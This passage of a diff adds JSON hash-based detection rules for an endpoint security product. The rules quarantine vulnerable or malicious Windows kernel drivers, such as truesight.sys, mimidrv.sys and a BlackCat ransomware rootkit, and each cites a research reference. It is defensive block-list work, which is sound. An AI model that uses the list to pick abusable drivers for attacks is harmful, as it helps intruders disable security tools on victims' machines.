"value": "994e3f5dd082f5d82f9cc84108a60d359910ba79", + "comment": "Malicious BlackCat/ALPHV Ransomware Rootkit (aka fgme.sys, ktes.sys, kt2.sys and ktgn.sys) [https://www.trendmicro.com/en_us/research/23/e/blackcat-ransomware-deploys-new-signed-kernel-driver.html] [file SHA1]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e8fc473c-4101-5c79-a7ec-6ef2721cea10", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + 
"origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.486199Z", + "creation_date": "2026-03-23T11:45:31.486202Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.486212Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a4e0129f40aeefed92e8353c3c2b73593fd9a4673f8480bcc89cdc28a17325d4", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e8ff58fa-f950-5e7f-9baa-b52627149639", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.820325Z", + "creation_date": "2026-03-23T11:45:31.820328Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.820337Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "776a6b62062565f3aaf361c57067ef6b043f7e65a92003ab3e02114f449a17cd", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e903fbe4-f3ef-509b-8f2e-1884347e01e2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.493930Z", + "creation_date": "2026-03-23T11:45:31.493933Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.493942Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a1ef67421bfa412aa90db0efee2176313bc40cf86ae31875387a47e57a46e561", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e90c2447-e7f4-5a81-834c-72ebc28b9553", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.622314Z", + "creation_date": 
"2026-03-23T11:45:29.622316Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.622322Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "bda99629ec6c522c3efcbcc9ca33688d31903146f05b37d0d3b43db81bfb3961", + "comment": "PassMark vulnerable driver (aka DirectIo32.sys and DirectIo64.sys) [CVE-2020-15479] [https://github.com/eset/vulnerability-disclosures/blob/master/CVE-2020-15479/CVE-2020-15479.md] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e910c018-baaa-5440-b8d9-a72d94db6b9e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.981165Z", + "creation_date": "2026-03-23T11:45:29.981168Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.981173Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "773999db2f07c50aad70e50c1983fa95804369d25a5b4f10bd610f864c27f2fc", + "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e9136986-a042-5a7b-be5e-65abd504c2c7", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.479183Z", + "creation_date": "2026-03-23T11:45:30.479185Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.479191Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7d4ca5760b6ad2e4152080e115f040f9d42608d2c7d7f074a579f911d06c8cf8", + "comment": "Vulnerable Kernel Driver (aka NCHGBIOS2x64.SYS) [https://www.loldrivers.io/drivers/d2806397-9ceb-47c8-b5f3-3aabec182ff5/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e937acc5-7c16-52de-92c8-a5c235bafba9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.809183Z", + "creation_date": "2026-03-23T11:45:31.809186Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.809195Z", + "rule_level": null, + 
"rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "853a8e09134f2f6bba979fd2c58da7f6891400a1d3466587e5da911f66f9d4a5", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e93854a4-a16a-5320-ae16-f3f839e57d62", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.140654Z", + "creation_date": "2026-03-23T11:45:31.140656Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.140661Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a5e0b93a56a54ab0d3a0280792e41e7bc4cbaad8c83296ea36a225257a9083f6", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e940579f-7060-5d30-b1e5-134a55e4926c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": 
"critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.141255Z", + "creation_date": "2026-03-23T11:45:31.141257Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.141262Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "bce1a5ad428f546c4ed60218c736d488dce97db171a9789c7bb100158adbb823", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e94c01aa-256f-552c-8837-c884ad19928d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.978014Z", + "creation_date": "2026-03-23T11:45:29.978016Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.978022Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"5cb1dc26159c6700d6cadece63f6defda642ec1a6d324daefb0965b4e3746f70", + "comment": "Vulnerable Kernel Driver (aka bw.sys) [https://www.loldrivers.io/drivers/578d4909-c2ba-4363-b6e3-98fb62d5e55c/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e94e621a-2c5a-55e7-b82b-d1a34c5a1683", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.142902Z", + "creation_date": "2026-03-23T11:45:32.142904Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.142910Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "490cfbb540dcd70b7bff4fdd62e7ed7400bbfebaf5083523d49f7184670f7b9a", + "comment": "Vulnerable Filseclab Driver (aka fildds.sys, filnk.sys and filwfp.sys) [https://twitter.com/SophosXOps/status/1764933865574207677] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e9527af1-2057-5c66-9769-4efe67a412d6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + 
"last_update": "2026-03-23T11:45:30.464709Z", + "creation_date": "2026-03-23T11:45:30.464712Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.464720Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "822982c568b6f44b610f8dc4ab5d94795c33ae08a6a608050941264975c1ecdb", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e954db85-c341-5ee6-a1ae-8e884aeb7cd4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.820190Z", + "creation_date": "2026-03-23T11:45:31.820193Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.820201Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b55a7edd07072c5c1113b5ca0cd7183ee46f764b8adf9e21cc59a2f22c3c4d8d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} 
+{ + "id": "e9569b8d-9423-57db-8da2-b6e9ca02ab66", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.145360Z", + "creation_date": "2026-03-23T11:45:31.145362Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.145367Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "57ceafd2895c255019669df566a5e666cc5e285abba0647978b980b1cb858205", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e95819aa-cb4d-5ebc-a7c4-48ed32ed7293", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.980699Z", + "creation_date": "2026-03-23T11:45:29.980701Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": 
"stable", + "hl_testing_start_time": "2026-03-23T11:45:29.980706Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0d10c4b2f56364b475b60bd2933273c8b1ed2176353e59e65f968c61e93b7d99", + "comment": "Vulnerable Kernel Driver (aka CtiIo64.sys) [https://www.loldrivers.io/drivers/de365e80-45cb-48fb-af6e-0a96a5ad7777/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e95e494e-ab8d-5f6e-ada8-329d1dfd4487", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.140726Z", + "creation_date": "2026-03-23T11:45:31.140728Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.140734Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ddef89f6c8b7ed80a517685245b7c4f534703a95f2d69495c7a92a88647ca68c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e95ec03d-a73a-59db-a592-219e57b788b3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + 
"rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.488257Z", + "creation_date": "2026-03-23T11:45:31.488259Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.488265Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c649a4fa9d7e58308b37764114361d3825bd40671dc8bb7db5d5fb35895d9946", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e9650d45-14da-5ba1-92f1-6d87278c3355", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.972508Z", + "creation_date": "2026-03-23T11:45:29.972510Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.972515Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": 
"hash", + "value": "e05eeb2b8c18ad2cb2d1038c043d770a0d51b96b748bc34be3e7fc6f3790ce53", + "comment": "TG Soft vulnerable driver (aka viragt.sys and viragt64.sys) [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e96546b5-17a4-598e-9a9e-22103f6e25d3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.978912Z", + "creation_date": "2026-03-23T11:45:29.978914Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.978919Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e2449ccc74e745c0339850064313bdd8dc0eff17b3a4e0882184c9576ac93a89", + "comment": "Vulnerable Kernel Driver (aka Black.sys) [https://www.loldrivers.io/drivers/4b047bb8-c605-4664-baed-25bb70e864a1/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e96bafbc-d941-5f9a-8375-beb01ec155c3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": 
{ + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.612974Z", + "creation_date": "2026-03-23T11:45:29.612976Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.612981Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "734b74798a680d2e534c14a033858c4081c7879af1f48037d9d5483aa27a7e90", + "comment": "Marvin Test Solutions HW vulnerable driver (aka Hw.sys and Hw64.sys) [https://decoded.avast.io/janvojtesek/the-return-of-candiru-zero-days-in-the-middle-east/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e96f5149-b3d7-5a25-b1fc-100855121a43", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.616808Z", + "creation_date": "2026-03-23T11:45:29.616810Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.616819Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "aef3985caa213c9e5e0a0d5e75a9a7918a92c08690b5a04a6b14d6372c2dd71c", + "comment": "American Megatrends vulnerable BIOS flash tool (aka UCOREW64.SYS and amifldrv64.sys) 
[https://www.loldrivers.io/drivers/a338a9fc-9fe3-400c-9fe4-69bb7892602d/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e97d5826-1ef7-5acd-ac82-805bd4006eb3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.976642Z", + "creation_date": "2026-03-23T11:45:29.976644Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.976650Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "cd66e893300e7e59a749fe4e1b1706f8ccb5ae140254def9f5a614648e2da36f", + "comment": "Malicious attestation-signed Drivers (aka NodeDriver.sys, 4.sys, Air_SYSTEM10.sys etc.) 
[https://www.mandiant.com/resources/blog/hunting-attestation-signed-malware] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e981b70e-d33f-5727-a247-eedc09afefdd", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.620072Z", + "creation_date": "2026-03-23T11:45:29.620074Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.620079Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9f1229cd8dd9092c27a01f5d56e3c0d59c2bb9f0139abf042e56f343637fda33", + "comment": "Intel vulnerable drivers (aka semav6msr.sys and piddrv64.sys) [https://github.com/eclypsium/Screwed-Drivers/blob/master/DRIVERS.md] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e9891970-1b74-5879-8ef6-410e0bfe9146", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.141612Z", + "creation_date": "2026-03-23T11:45:31.141614Z", + "enabled": 
true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.141619Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "40a9e2cd3755180f9b1ed21616ec9a8442d5618361a0a17b6332d1ae1bec5058", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e98a8bec-2318-552e-b78e-7ea8b59ef0ff", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 